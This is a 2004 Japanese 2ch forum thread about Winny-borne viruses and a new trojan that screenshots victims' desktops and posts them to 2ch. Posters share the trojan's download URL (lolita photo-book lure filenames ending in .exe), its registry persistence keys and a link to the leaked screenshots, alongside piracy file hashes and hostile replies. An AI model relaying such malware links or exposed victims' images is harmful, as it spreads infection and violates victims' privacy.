ぽと0にしても、UPしないというわけじゃない
普通は相手からセッション開始してUPするのだが
nyのポト0は自分からセッション開始してUPするらしい

つまりポト0であろうが、うpするから拡散する
ぽと0同士はだめだろうけど

365 :[名無し]さん(bin+cue).rar:04/09/20 18:05:43 ID:01dHSg1r
>>364
ということは、ウイルスがポート設定まで
変えてしまうということですか。

366 :[名無し]さん(bin+cue).rar:04/09/20 18:20:10 ID:29BOiMd4
>>365
要は、「キンタマ踏んだけど、私のデータ流失してませんよね?」ってことか?

367 :[名無し]さん(bin+cue).rar:04/09/20 18:23:05 ID:TyAT+7N1
>>365
ウイルス関係なく
ポート0でもみんな普通にうpしてるってこと

368 :[名無し]さん(bin+cue).rar:04/09/20 18:33:38 ID:gy//M/pW
>356
よく意味がわからん
txtファイルらしきものが開けなかったということか?
テンプレの感染症状確認してみたか

>363
とりあえず捏造警告でも出しといてくれ

369 :[名無し]さん(bin+cue).rar:04/09/20 19:19:39 ID:01dHSg1r
>>366、367
そうです。ポート0にしてても感染するとupするのですか。
また、感染してなくてもポート0で普通のスピードでupしてるのですか。


370 :[名無し]さん(bin+cue).rar:04/09/20 19:27:24 ID:oM44BT6y
まぁageなくてもいいじゃないか

371 :[名無し]さん(bin+cue).rar:04/09/20 19:34:59 ID:gy//M/pW
>369
うp速度ははny見て自分で確かめろ

つーか>>367読んだ?
ぽと0でも
感染とか関係無しにうpはしてると言ってるじゃねえか

372 :[名無し]さん(bin+cue).rar:04/09/20 19:52:54 ID:01dHSg1r
分かりました。ウイルスに関係なくupされるのですね。
では、感染してもポート0設定は解除されないのですか。

373 :[名無し]さん(bin+cue).rar:04/09/20 19:58:04 ID:ZhyfpYqT
ぜんぜん話を聞いてねえな(w。

374 :[名無し]さん(bin+cue).rar:04/09/20 20:04:18 ID:X2VuaJN2
01dHSg1r
こいつ質問スレでも粘着して質問繰り返してるよ・・・・・
見事にスルー/放置されてこっちになだれ込んでるみたいだな・・・・・

スルー/放置することをお勧めする

by 総合質問スレ住人より

375 :[名無し]さん(bin+cue).rar:04/09/20 20:09:41 ID:6eHXzHXd
情報dクス

376 :[名無し]さん(bin+cue).rar:04/09/20 20:23:41 ID:gy//M/pW
>372
そんな症状は無い
おまえがどのウィルスのことを言ってるのか知らんが
既出のantinnyにそのようなことをするものはない
そういう症状があってもそれは亜種であり
俺の知ったこっちゃ無い


377 :[名無し]さん(bin+cue).rar:04/09/20 20:30:08 ID:t5Flw/k8
771 名前:名無しさん :04/09/20 20:23:00
キンタマ感染しても、ポート警告が多い等の理由でポート0設定にしてたら個人情報は流出しないのでしょうか。
どなたか教えてください。

こんなん見つけました

378 :[名無し]さん(bin+cue).rar:04/09/20 20:30:19 ID:+pzCupw3
01dHSg1rは脳内が感染してる模様です。

379 :[名無し]さん(bin+cue).rar:04/09/20 20:32:28 ID:SiszVWzf
sageも出来ん厨は放っとけ

どーせ後20日ぐらいの命なんだからw

380 :[名無し]さん(bin+cue).rar:04/09/20 21:58:26 ID:5G7BbgQX
  /|:: ┌──────┐ ::|
  /. |:: |          | ::|
  |... |:: |   キンタマ  .| ::|
  |.... |:: |          | ::|
  |  |:: |           | :: |
  |.... |:: └──────┘ ::|
  \_|    ┌────┐   .|     ∧∧
      ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄     (  _)
             / ̄ ̄ ̄ ̄ ̄旦 ̄(_,   )
            /             \  `
           | ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄|、_)
             ̄| ̄| ̄ ̄ ̄ ̄ ̄ ̄| ̄| ̄

     |           .( (   |\
     | )           ) ) | | .|
     |________(__| .\|
    /―   ∧ ∧  ――-\≒
  /      (    )       \
  | ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ |
  |______________|

   ∧∧
  (  ・ω・)
  _| ⊃/(___
/ └-(____/
 ̄ ̄ ̄ ̄ ̄ ̄ ̄

  <⌒/ヽ-、___ <シクシク
/<_/____/

381 :[名無し]さん(bin+cue).rar:04/09/20 23:49:32 ID:MII97qGv
なんかやられたぽいけどどうしていいかわからん!
やばいね。。。。


382 :[名無し]さん(bin+cue).rar:04/09/20 23:57:41 ID:QpxhU4DL
脳細胞が?

383 :[名無し]さん(bin+cue).rar:04/09/21 00:01:26 ID:PeBObryp
>>381
あきらめればー

384 :[名無し]さん(bin+cue).rar:04/09/21 00:17:51 ID:zzCMoBJp
>>381
ん?アップフォルダーにJPGとか勝手に出来てるの?

385 :[名無し]さん(bin+cue).rar:04/09/21 00:24:24 ID:QYcixn2/
>>381
気にしない、気にしない。
人間も風邪ひくだろ。たいていは、ほうっておいたら直る。
誰もキミなんか興味ないって。

386 :[名無し]さん(bin+cue).rar:04/09/21 00:58:34 ID:26jKQ6TK
ぬるぽに感染したらもう入れ直すしかない?

387 :[名無し]さん(bin+cue).rar:04/09/21 00:59:48 ID:Am6yVj5+
>>386
気にしない、気にしない。
人間も風邪ひくだろ。たいていは、ほうっておいたら直る。
誰もキミなんか興味ないって。

388 :[名無し]さん(bin+cue).rar:04/09/21 01:00:57 ID:NQ2ccG6A
うn

389 :[名無し]さん(bin+cue).rar:04/09/21 01:05:02 ID:ewgN3Zaq
こいつら情報スレで質問するのかorz

390 :[名無し]さん(bin+cue).rar:04/09/21 04:18:44 ID:1AgtokjT
WinRARでzipファイルの中身を覗こうとしたら
「予期しない書庫の終わりです」って出る時がありますが
zip偽装のウイルスだったってことはありえるんでしょうか?

391 :[名無し]さん(bin+cue).rar:04/09/21 04:22:46 ID:Ob38LuoD
NGID:1AgtokjT

392 :[名無し]さん(bin+cue).rar:04/09/21 04:41:18 ID:A/77/Zjy
>>390
死ねばー


393 :[名無し]さん(bin+cue).rar:04/09/21 07:20:26 ID:gkeWQVJo
自動実行(窓の手で確認)に「NvCplDaemon」というのが入っているのは正しいのでしょうか?
ウイルスでランダムに作った名前にも思えるのですが自分では判断出来ません。
(いろいろアップデートした後ぐらいに見つけた)
ノートン(LiveUpdata済)で完全スキャン、オンラインスキャンしても未検出でした。
テンプレに書いてあることも確認しました。ウイルスらしい現象は起きてません。
教えてください、お願いします。

394 :[名無し]さん(bin+cue).rar:04/09/21 07:39:00 ID:OTnuHmca
>>393
個別環境依存なものについては、それが入っていようがいまいが、正しいも正しくないも無い。
それが疑うべきものか否か知りたいなら、自動実行されるファイルの実体が何かを調査確認すれば良い。
そのくらい自分でやれ。

395 :[名無し]さん(bin+cue).rar:04/09/21 08:19:02 ID:0LVQliwh
>>363
みつけた以上は、ちゃんと踏んでよ。
問題の「.exe」は、FFFTP.exe。無害。

!!(一般コミック) [二ノ宮知子] のだめカンタービレ 第04巻(別スキャン単頁).zip 28,205,885 ee32043b7fe7dd03f72b29052cc692a2

396 :[名無し]さん(bin+cue).rar:04/09/21 08:34:22 ID:LErTzGQS
>>393
nVIDIA系グラボの管理ツール

397 :[名無し]さん(bin+cue).rar:04/09/21 08:53:34 ID:GIP/dP7o
>>393
心配なら、VGAドライバを削除しなさい。

398 :[名無し]さん(bin+cue).rar:04/09/21 19:01:12 ID:h+5OsQ8n
Antinny.Gってsvchost.exeに関係した症状出る?
タスクマネージャー開いたらsvchostがいっぱい起動してて怖いんだけど、
これは普通のことだろうか?

399 :[名無し]さん(bin+cue).rar:04/09/21 19:08:46 ID:CINLeBhc
>>398
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_ANTINNY.G
一応関係した症状出すみたいだが、svchostはいくつかあってもおかしくは無い。
漏れも4つほどある。

400 :[名無し]さん(bin+cue).rar:04/09/21 19:25:02 ID:rBc6YMGm
Autorun+batに感染してしまって早速テンプレの駆除方法を試そうとしたのですが
マウントした際に焦って脊髄反射でファイルを消してしまったんです。
この場合どう対処したら良いのでしょうか?ご教授お願いします。

401 :398:04/09/21 19:29:16 ID:h+5OsQ8n
サンクス。俺は6つ。
うーん、一通り駆除はしたんだけどなんか不安だからシステムの復元は無効にしとこうかな。
そっちのほうが危ないかな。

402 :[名無し]さん(bin+cue).rar:04/09/21 20:02:14 ID:uyZ9F6OJ
(ドラマCD)爆裂天使 SUIT CD-3 “天”Amy-11.lzh ed74776ae946eb13f3bf08c125cf21b1

解凍したら3つもexeファイルが。 あぶねーあぶねー

403 :[名無し]さん(bin+cue).rar:04/09/21 20:40:10 ID:3WF2fKD3
嘘偽りなく爆裂天使だったと

404 :[名無し]さん(bin+cue).rar:04/09/21 20:43:02 ID:k431Nsjg
しかし地獄行く。

405 :[名無し]さん(bin+cue).rar:04/09/21 21:09:34 ID:YJeLXY2I
もうなんのスレなんだかワカラネ

406 :[名無し]さん(bin+cue).rar:04/09/21 21:47:23 ID:vd9Wwl8A
いままで拡張子がlzhのファイルってまともなのみたことないんだけど

ていうかすでに.lzhで無視リストにいれてるな

407 :[名無し]さん(bin+cue).rar:04/09/21 21:49:31 ID:nBwO3wnF
ウィルス雑談&相談スレッドつくるか、あきらめる化だな。

408 :[名無し]さん(bin+cue).rar:04/09/21 22:06:21 ID:YrabcswT
作ったところであまり意味はなさそうだな
亜種に感染したときに一番簡単で安全な対策が再インスコだからな
既出のはトレンドマイクロやシマンテック見てわからんかったらあきらめろでいいし

409 :[名無し]さん(bin+cue).rar:04/09/21 22:16:23 ID:cnhAAVmy
>>400
自分が落としたと思われるエロゲーを再度落としてみて、確認してみれば?

410 :[名無し]さん(bin+cue).rar:04/09/21 22:50:33 ID:UiYxUKH4
>>395
最近のFFFTPには女性の悲鳴みたいなWAVEリソースが埋め込まれているのか?

411 :[名無し]さん(bin+cue).rar:04/09/21 23:17:25 ID:3lHKQVDf
「CROSS†CHANNEL NOCD化パッチ」というファイルをDLしてexeを起動したら
妙なカウントが30くらいから始まって急いで消そうと頑張るのだがキャンセルボタンは近づくと逃げました。結局強制終了でなんとかなりました
それはウィルス等の類ですか?↑分かりにくい説明でしたがカウントが0になるとどうなるかとか教えてください

乱文すみません

412 :[名無し]さん(bin+cue).rar:04/09/21 23:22:15 ID:44EMXIte
>>411
ばーか

413 :[名無し]さん(bin+cue).rar:04/09/21 23:22:23 ID:uQLhGl2H
>>411
は?NOCD化パッチなんだからNOCD化されるに決まってんじゃん
おまえバカ?

414 :[名無し]さん(bin+cue).rar:04/09/21 23:25:53 ID:rBc6YMGm
>>409
ありがとうございます。盲点でしたw
大分テンパってたせいか気付きませんでした。
そうか、もう一回ウイルスを落とせばいいんダ。

415 :[名無し]さん(bin+cue).rar:04/09/21 23:26:54 ID:FI5JQism
>>412
駒田の真似か?

416 :[名無し]さん(bin+cue).rar:04/09/21 23:32:42 ID:NQ2ccG6A
止めようとしてキャンセル(と書かれたボタン)押そうとした時点で
お前はnyやるレバルじゃない

417 :[名無し]さん(bin+cue).rar:04/09/21 23:33:41 ID:NQ2ccG6A
っつーかカウント0前に強制終了しようとしまいともう既に手遅れかと

418 :[名無し]さん(bin+cue).rar:04/09/21 23:34:44 ID:YrabcswT
>411
もうどうしようもない
不安ならさっさと再インスコしろ


419 :[名無し]さん(bin+cue).rar:04/09/21 23:57:42 ID:bwzqiaf3
nnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnキンタマ

420 :[名無し]さん(bin+cue).rar:04/09/22 00:13:32 ID:yTZI13Ma
現在でてるANTINNYウイルス(亜種も含む)で、デスクトップ上の
マイドキュメントやゴミ箱からも情報をとるものはあるのでしょうか。


421 :[名無し]さん(bin+cue).rar:04/09/22 00:29:39 ID:GLE7KMbZ
ageruna baka

422 :[名無し]さん(bin+cue).rar:04/09/22 00:29:42 ID:XeEl/z1A
わからない。たとえあったとしても…
とられてこまる情報をマイドキュメントなどに保存する愚か者はこのスレにいないので問題ない。

423 :[名無し]さん(bin+cue).rar:04/09/22 00:39:44 ID:tsO6tEnU
おい、そんな事言ったら>>420がかわいそうだろ

424 :[名無し]さん(bin+cue).rar:04/09/22 00:43:45 ID:zxSY1Bfi
すみませn
antinny.hってどんな症状なんすか??
知ってる人おしえてください


425 :[名無し]さん(bin+cue).rar:04/09/22 00:44:03 ID:y92j+6hG
>>416




         「レバル」 ってなんですか








426 :[名無し]さん(bin+cue).rar:04/09/22 00:44:10 ID:iDhsW6nH
「俺のマイピクチャ」まだーー?

427 :[名無し]さん(bin+cue).rar:04/09/22 00:48:48 ID:BSHES9c3
>>420
>>424
おまえの質問に答えること それ自体は容易い 簡単だ
感染した時の症状はこれこれこう こういう問題が起き
何時間後発動し 隔離は・・・・・・? 駆除は? 再インスコは・・・・?
そんな話はいくらでもできる
しかし 今 俺がそんな話を 仮にしたとしても
その真偽はどうする・・・・・・?
真偽などどうでもいいから 聞きたいというのか・・・・?
ククク・・・・・・
すでにこのスレに書き込んでいるおまえには オレの話の裏をとる術はない
オレが何を語ろうと 結局ただそれを 盲目的に信じるしか道はない
つまり どんないい話を聞いても それは単なる気休めにしかすぎないってことだ
違うか・・・・・・?

428 :[名無し]さん(bin+cue).rar:04/09/22 00:51:46 ID:tsO6tEnU
>>426
よし、俺が流してやる

429 :[名無し]さん(bin+cue).rar:04/09/22 00:53:30 ID:zLHcnXpB
>>425
え?レバル知らないの?
ちょっと君 やばいな
公安にマークされるよ

430 :[名無し]さん(bin+cue).rar:04/09/22 01:04:53 ID:IONPryem
>>425
((((((;゚Д゚))))))ガクガクブルブル

431 :[名無し]さん(bin+cue).rar:04/09/22 01:46:54 ID:8QR9/+v0
>>402
.exe入ってるファイルなんて山ほどあるんだから、
「これに.exe入ってました」という報告はイラネ
ちゃんと実行させてから来い

432 :393:04/09/22 02:06:37 ID:3vM35NCY
>>396-397
情報ありがとうございます。
一応アンインストールして入れ直してみます。

>>394
ごめんなさい。

433 :` ◆NgatoX7m1. :04/09/22 02:31:33 ID:HYd9vI3J
「exe」←コレ、なんて読むのぉ?

イグジ??

434 :[名無し]さん(bin+cue).rar:04/09/22 02:45:20 ID:DFcwEF7M
いーえっくすいー

435 :[名無し]さん(bin+cue).rar:04/09/22 02:46:46 ID:cHFtlyXw
エグゼだろ

436 :[名無し]さん(bin+cue).rar:04/09/22 02:49:11 ID:vbBsFXrI
ロックマン?
バルドフォース?

437 :[名無し]さん(bin+cue).rar:04/09/22 02:58:06 ID:ETFJAFZu
>>433
.avi 読み方: エー ブイ アイ
.bmp 読み方: ビーエムピー
.exe 読み方: エグゼ
.gif 読み方: ジフ
.html 読み方: エイチ ティー エム エル
.jpg 読み方: ジェイペグ
.mpeg 読み方: エムペグ
.pdf 読み方: ピー ディー エフ
.wav 読み方: ワブ
.zip 読み方: ジップ

ttp://support.microsoft.com/default.aspx?scid=/directory/worldwide/ja/glossary/

438 :[名無し]さん(bin+cue).rar:04/09/22 03:01:32 ID:zVcTvScF
>>437
>.gif 読み方: ジフ
>.wav 読み方: ワブ
ギフ、ウェイブだと思ってたOTL

439 :[名無し]さん(bin+cue).rar:04/09/22 03:04:42 ID:cHFtlyXw
別にウェイブでもいいだろ。
.bmpとか普通にビットマップって読んでるしな

440 :[名無し]さん(bin+cue).rar:04/09/22 04:20:17 ID:xUMasHO2
>exe 読み方: エグゼ

「エグいぜ!」  と読んでいた・・・


441 :[名無し]さん(bin+cue).rar:04/09/22 04:34:30 ID:MVU/5bip
>.exe
ここの方言では「ういるす」と読む。
あまり知られてないようだが・・・

442 :[名無し]さん(bin+cue).rar:04/09/22 04:52:00 ID:zLHcnXpB
>avi 読み方: エー ブイ アイ

俺は「アヴィ」と呼んでた。決して「アビ」ではない。
言っておくが唇は血が滲むくらい噛んで読めよ。

443 :[名無し]さん(bin+cue).rar:04/09/22 05:15:36 ID:mrLzYwy8
口内炎になっちゃいます。
つーかもうなりました。


俺の場合、アヴィとビットマップとウェーブくらいかな、違うところは。

444 :[名無し]さん(bin+cue).rar:04/09/22 05:29:48 ID:F/drtkw3
>>443
房黙

445 :[名無し]さん(bin+cue).rar:04/09/22 08:34:56 ID:GLUesFjZ
イグゼと読んでるなあ
あとギフでもいいはず

446 :[名無し]さん(bin+cue).rar:04/09/22 11:14:24 ID:j/18rTjQ
岐阜みたいでナウい

447 :[名無し]さん(bin+cue).rar:04/09/22 13:29:49 ID:jzo10T46
お 君はヤングだね おいらもヤングさ フィーバーしようぜ!

448 :[名無し]さん(bin+cue).rar:04/09/22 13:38:57 ID:Xh7RFvqN
岐阜はナウでイカス

449 :[名無し]さん(bin+cue).rar:04/09/22 14:06:07 ID:ukACuFTt
>>437
M$もわざわざそんなもん作ってんだねw
exeをエグゼってのはなんかゲームの世界みたいだな・・・

450 :[名無し]さん(bin+cue).rar:04/09/22 14:22:35 ID:CiebCEfA
aviはアビだろ

451 :[名無し]さん(bin+cue).rar:04/09/22 14:38:05 ID:3USje0wW
UINGUGANDAMU

452 :[名無し]さん(bin+cue).rar:04/09/22 14:55:20 ID:9gdQfsyR
PC初心者板じゃないんだからほどほどに

453 :[名無し]さん(bin+cue).rar:04/09/22 15:05:05 ID:dQ12lTaF
じゃあお前らexeをかなで打ってみろ

えぇ

454 :[名無し]さん(bin+cue).rar:04/09/22 15:05:16 ID:WgF4Qzwt
感染してからここに駆け込んで助けを求める初心者がいるがなー。

455 :[名無し]さん(bin+cue).rar:04/09/22 15:18:16 ID:G5rN2r09
http://music4.2ch.net/test/read.cgi/musicnews/1095563850/15-18
これってshare利用者を狙ったウイルス?

456 :[名無し]さん(bin+cue).rar:04/09/22 16:26:42 ID:9wErnaQd
>>455
513 名前:[名無し]さん(bin+cue).rar [sage] 投稿日:04/09/22(水) 05:09:53 ID:IJUa2BF4
【OS】Windows XP SP2に2種類の脆弱性
 http://pc5.2ch.net/test/read.cgi/pcnews/1093226380/
特撮エロを
 http://tmp4.2ch.net/test/read.cgi/download/1095345507/
次世代共有PS2ソフト“食卓塩”開発
 http://tmp4.2ch.net/test/read.cgi/download/1093715748/
【本物】WINNYお宝ファイル真贋スレ【偽物】
 http://tmp4.2ch.net/test/read.cgi/download/1093786275/
エロゲー板ローカルルール申請
 http://qb5.2ch.net/test/read.cgi/operate/1094443286/
一般海外生活板ローカルルール申請
 http://qb5.2ch.net/test/read.cgi/operate/1095512881/
【あわや】OFF板コテが20娘をナカ出しハメ撮り【妊娠】
 http://live15.2ch.net/test/read.cgi/festival/1095597679/
【植物】ケチャップ用トマトの甘味遺伝子LIN5について
 http://news16.2ch.net/test/read.cgi/scienceplus/1095696790/
初級ネットワーク板ローカルルール申請
 http://qb5.2ch.net/test/read.cgi/operate/1095695740/

被害者100名強
 やっちゃってないか心配な人へ
 list.zip 5,728 6b1ab91ddc26ac315a5592098cc4d806db9a476c

457 :[名無し]さん(bin+cue).rar:04/09/22 16:28:15 ID:pfnybTQU
>>455
ここはnyスレだぞShareはほっときゃいいんだよ。
どうしても聞きたいんならShareスレへ池。

458 :[名無し]さん(bin+cue).rar:04/09/22 16:36:01 ID:jzo10T46
>>454
でも そのny初心者うぃ〜虐めるんで、寄り付かなくなってるし・・・

459 :[名無し]さん(bin+cue).rar:04/09/22 16:59:26 ID:9GkE2lGq
ヌルポースもおさまり、とくに新種も亜種もでてないんだから
スレが死んでてもかまわない
今更キンタマに感染しました〜っていうのを聞いててもしょうがないだろ

460 :[名無し]さん(bin+cue).rar:04/09/22 17:17:22 ID:jzo10T46
でも大抵 質問してくるのは指摘通りの新種、亜種以外なら圧倒的に
初心者による既存ウイルス被害者だろ?

したがって散々既出とはいえ、敷居を高くしすぎるのもどうかと思ったんだよね。
質問に答えるかどうかは あくまで善意と個人の資質の問題だからさ。
いやなら無視していればよいわけだし・・・
無駄レスの可能性があっても それは許容していったほうがよくね?
もっとも速報系スレなら まずいだろうけどさ。

461 :[名無し]さん(bin+cue).rar:04/09/22 18:38:20 ID:DD8VmRNY
>>453
いさい

462 :[名無し]さん(bin+cue).rar:04/09/22 19:18:30 ID:jIZTPKHy
久しぶりにダウン版来たけど
ウィルスやらなにやら大変になったねぇ・・・

463 :[名無し]さん(bin+cue).rar:04/09/22 20:00:51 ID:6gk9JVQ6
そろそろ面白いことになるから覚悟しとけよおまいら

464 :[名無し]さん(bin+cue).rar:04/09/22 20:08:02 ID:AmnzJVzB
犯罪予告ディスカ?

465 :[名無し]さん(bin+cue).rar:04/09/22 21:17:01 ID:bZGJWpm+
感染するとデスクトップをキャプされて、それを定期的にうpロダにあげて、
その画像へのリンクを特定スレに自動書き込みするウィルスが
はやってるらしい。みんな気をつけて!

エロアニメ動画をみている状態のデスクトップとか晒されててワロタ

キャプチャされたデスクトップがウィルスによって晒され続けてるスレ
角二 【うpろだ】アップローダー案内所11【アプロダ】
http://idol.bbspink.com/test/read.cgi/ascii2d/1095176627/192-

関連スレ
セキュリティ板 ウィルス情報&質問 総合スレッド☆Part24
http://pc5.2ch.net/test/read.cgi/sec/1094383672/412-

キンタマのWeb版みたいなもんなの?

466 :[名無し]さん(bin+cue).rar:04/09/22 21:35:46 ID:9rRhf0vV
>>465
こりゃ最凶だ

467 :[名無し]さん(bin+cue).rar:04/09/22 21:36:30 ID:XwcsDIdF
キンタマ改造版だな。
節穴機能が付いてないだけましか。
そのトロイどこかで入手できないもんかなァ。激しく解析してみたいぞ(w
Webとかjpeg感染タイプが出てくると、結構脅威だろーな。
nyだけじゃなくて、世界的に笑える

468 :[名無し]さん(bin+cue).rar:04/09/22 21:37:25 ID:koLWP3nB
これスレが新しくなっても自動書き込みするようになってるんだな…

469 :[名無し]さん(bin+cue).rar:04/09/22 21:40:54 ID:yMfO9itd
>>467
ほれ
つttp://strawberry.web-sv.com/cgi/up/ia/up1360.zip
中身はロリータ写真集だw

470 :[名無し]さん(bin+cue).rar:04/09/22 21:41:25 ID:Fk55VY7i
>>467
苺のアプロダ・1MBの1360.zipがウイルスだ

471 :[名無し]さん(bin+cue).rar:04/09/22 21:42:01 ID:JgXMRF3E
>>460
答える人に対しては誰も文句は言ってないはず。
質問に答える意欲と知識を持った人が質問に居合わせれば
今までもどんな駄レスにだって普通に返答はあった。
何でもオーライな空気なんて百害有って一利無し。必要ない。

472 :[名無し]さん(bin+cue).rar:04/09/22 21:43:34 ID:XwcsDIdF
しかし、新スレ追跡してるけど、強力だなぁ…
何に埋められてるんだろ。ほしいぃ

473 :[名無し]さん(bin+cue).rar:04/09/22 21:49:41 ID:fz84/HQL
up.isp.2ch.net/upload/c=03okari/index.cgi
ここで直接見れるよ>キャプ

474 :[名無し]さん(bin+cue).rar:04/09/22 21:50:31 ID:XwcsDIdF
469-470
サンクスコ、解析してみる。
ご親切に、フォルダアイコンになってるね。
バイナリエディタで覗いてみただけでも、相当作りこまれてるのがわかる
「そんなスレッド/板ありません」を検知して、別スレに飛ぶ機能もある
おーい、こいつメール砲機能あるみたいだぞ

キンタマ亜種とか改造版じゃなくて、まったく新規に作ってるっぽいな。
しかも、かなり念入り。詳しくはもうちょっとお待ちを…

475 :[名無し]さん(bin+cue).rar:04/09/22 21:51:07 ID:6gk9JVQ6
432 :名無しさん@お腹いっぱい。 :04/09/22 21:44:41
>>412


169 :名無したん(;´Д`)ハァハァ :04/09/22 21:39:41 ID:LP+Ly6X1
23 :名無しさん@ゴーゴーゴーゴー! :04/09/22 21:37:54 ID:kcrfEebX
実行結果:

追加されるファイル:
windows\shellsystem.exe 678kB

追加されるレジストリ:
HKEY_USER\.Default\Software\Microsoft\Windows\CurrentVersion\Run
shellsystem.exe :='C:\Windows\shellsystem.exe'

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
shellsystem.exe :='C:\Windows\shellsystem.exe'



476 :[名無し]さん(bin+cue).rar:04/09/22 21:53:32 ID:XwcsDIdF
ちなみに、ノートン先生最新版では検出せず。
すぐに回線切れよ>かかった香具師

477 :[名無し]さん(bin+cue).rar:04/09/22 21:54:19 ID:MORRrkle
>>474
フォルダと思ってWクリックしたら、exe実行ですか・・・。
解析乙です。報告お待ちしてます。

478 :[名無し]さん(bin+cue).rar:04/09/22 21:54:33 ID:9rRhf0vV
これって、shareフシアナ晒しage→shareクリップボード晒し→苺デスクトップ晒し

って進化?していったのか?

479 :[名無し]さん(bin+cue).rar:04/09/22 21:58:33 ID:TGFooCp8
>>478
同時多発っぽい

480 :[名無し]さん(bin+cue).rar:04/09/22 21:58:58 ID:F8v+LexZ
すげーな作者!GJ!

481 :[名無し]さん(bin+cue).rar:04/09/22 21:59:18 ID:0Y8OIFWt
Shareのってうさんくさいパッチあてるとなるやつか?

482 :[名無し]さん(bin+cue).rar:04/09/22 21:59:25 ID:zRg+AmZG
一度流れたら半永久的に削除不能なキンタマに比べたら救いがある?

483 :[名無し]さん(bin+cue).rar:04/09/22 22:00:56 ID:vLbTjc4V
>>479
2ちゃん同時多発テロか?

484 :[名無し]さん(bin+cue).rar:04/09/22 22:02:59 ID:zasm0Yrz
exe圧縮してないからバイナリエディタとリソースエディタで
中見られるな。
これ改造も容易だし、亜種出回りそうだな。
ウイルスチェッカー制作企業とかに報告が行けばいいが。

485 :[名無し]さん(bin+cue).rar:04/09/22 22:03:06 ID:F8v+LexZ
この作者の優しいとこはうpロダをわざわざ2CHロダにしてくれたとこだな。
ここ消せないけど2chプロバイダ入ってないやつは24時間で見えなくなるし。

あやしいわーるどのうpロダとかに画像うpされるようになったら最悪じゃない??
あそこって結構長持ちだし自分で削除できないしime.nu経由で開いたらブラクラになるんでしょ??



作者見てる〜?

486 :[名無し]さん(bin+cue).rar:04/09/22 22:03:33 ID:WK8P1uKu
おまいらって、初心者には厳しいが新種にはホントに嬉々とするよな(・∀・)

487 :[名無し]さん(bin+cue).rar:04/09/22 22:04:59 ID:tOdOsShM
>>482
誰かが纏めたのをnyに流しそう

488 :[名無し]さん(bin+cue).rar:04/09/22 22:07:17 ID:0Y8OIFWt
感染源はどこなんだ?

489 :[名無し]さん(bin+cue).rar:04/09/22 22:08:11 ID:OFqE6GX2
私は苺で違法ダウンロードばかりしている犯罪者です
http://news13.2ch.net/test/read.cgi/news/1095854900/
【洒落】キンタマウィルスのWeb版
http://news13.2ch.net/test/read.cgi/news/1095858175/

490 :[名無し]さん(bin+cue).rar:04/09/22 22:08:31 ID:1t6CyIj6
だれか単独スレ立てろ

491 :[名無し]さん(bin+cue).rar:04/09/22 22:11:39 ID:oYMFNm7J
それにしても何でこんな大勢がクリックしちゃったワケ?
そんなに魅力的なファイルだったのか?

492 :[名無し]さん(bin+cue).rar:04/09/22 22:12:35 ID:F8v+LexZ
(写真集)(ロリータ)水原友里
(写真集)(ロリータ)相田加奈子
(写真集)(ロリータ)河瀬菜美

ってファイル名だったらしいよ

493 :[名無し]さん(bin+cue).rar:04/09/22 22:12:41 ID:g1+bfA34
ロリファイルは大人気でしょう

494 :[名無し]さん(bin+cue).rar:04/09/22 22:14:27 ID:JgXMRF3E
>>491
トリビアスレにファイルのリンク貼った奴がいたみたいだが

495 :[名無し]さん(bin+cue).rar:04/09/22 22:14:47 ID:IuQLM0ec
>>491

>>469

496 :[名無し]さん(bin+cue).rar:04/09/22 22:15:17 ID:zasm0Yrz
>>492
正確にはその全ての尻に.exeがついていたがな。
エクスプローラーの設定で、拡張子見えるようにしておかない奴らが
いかにも踏む感じの奴だった。アイコンがフォルダだったし。

497 :[名無し]さん(bin+cue).rar:04/09/22 22:15:52 ID:lbxNYg0M
ttp://strawberry.web-sv.com/cgi/up/ia/up1360.zip

の中にある EXEのフォルダをクリックしたら感染

注意!('A`)9m

498 :[名無し]さん(bin+cue).rar:04/09/22 22:16:46 ID:cHFtlyXw
俺でさえも(ry が予兆だったって事?

499 :469:04/09/22 22:17:05 ID:yMfO9itd
>>495
スマン
俺は別に引っ掛ける気は無かったんだが、
>>467へのレスなわけだし。





結局おまいも、引っかかったんだろ?

500 :[名無し]さん(bin+cue).rar:04/09/22 22:17:29 ID:IuQLM0ec
10 名前:番組の途中ですが名無しです:04/09/22 22:09:56 ID:VXSuEMJY
これと同じウィルスが数日前に放尿スレにあったんだよな。
ノートンで検出されないってのは怖いな。


767 名前:私は放尿絵で興奮する変態です[G4zsGnQECv:40回目] 投稿日:04/09/18(土) 15:10:02 ID:GhekIZuS

http://v.isp.2ch.net/up/63ea6ede343b.jpg


501 :[名無し]さん(bin+cue).rar:04/09/22 22:17:30 ID:EQvNm7YP
これ苺とかってアプロダに上げられた>>469から感染したんだろ?
K札動けばアップした奴(から作者まで)の特定が可能なんじゃね?


502 :[名無し]さん(bin+cue).rar:04/09/22 22:19:48 ID:3zEu3lCZ
>>497
ブラクラ・ウイルス張るときは「ht」まで抜いてくれますかね

503 :[名無し]さん(bin+cue).rar:04/09/22 22:21:36 ID:l67SMSG4
アップローダに上げてるってことは普通に考えれば自己感染もアップローダ経由になるんじゃねーの

504 :[名無し]さん(bin+cue).rar:04/09/22 22:24:38 ID:F8v+LexZ
ウイルスだって解ってるURL貼るときは

htt://strawberry.web-sv.com/cgi/up/ia/up1360.zip

にしたほうがいいんじゃないの?
これなら大抵の専用ブラウザでもリンクできないでしょ?

505 :[名無し]さん(bin+cue).rar:04/09/22 22:24:43 ID:Pp/pgXRx
盛り上がらないニュ速板。

506 :[名無し]さん(bin+cue).rar:04/09/22 22:26:57 ID:rr+OCUUx
うpろだ死んだ

507 :[名無し]さん(bin+cue).rar:04/09/22 22:28:02 ID:1t6CyIj6
うpろだが重すぎて画像見づらいから盛り上がらん。

キンタマみたいにファイル詰め合わせ(ウィルスつき)だったら
2次感染もあってすごいことになるのに

508 :[名無し]さん(bin+cue).rar:04/09/22 22:29:57 ID:Sxm2sX2b
>>492
>>469の中身は↓だった。同じ内容の.exeファイルが三つ。

(写真集)(ロリータ)水原友里.exe
(写真集)(ロリータ)相田香奈子.exe
コピー〜(写真集)(ロリータ)河瀬菜美.exe


509 :[名無し]さん(bin+cue).rar:04/09/22 22:35:19 ID:0Y8OIFWt
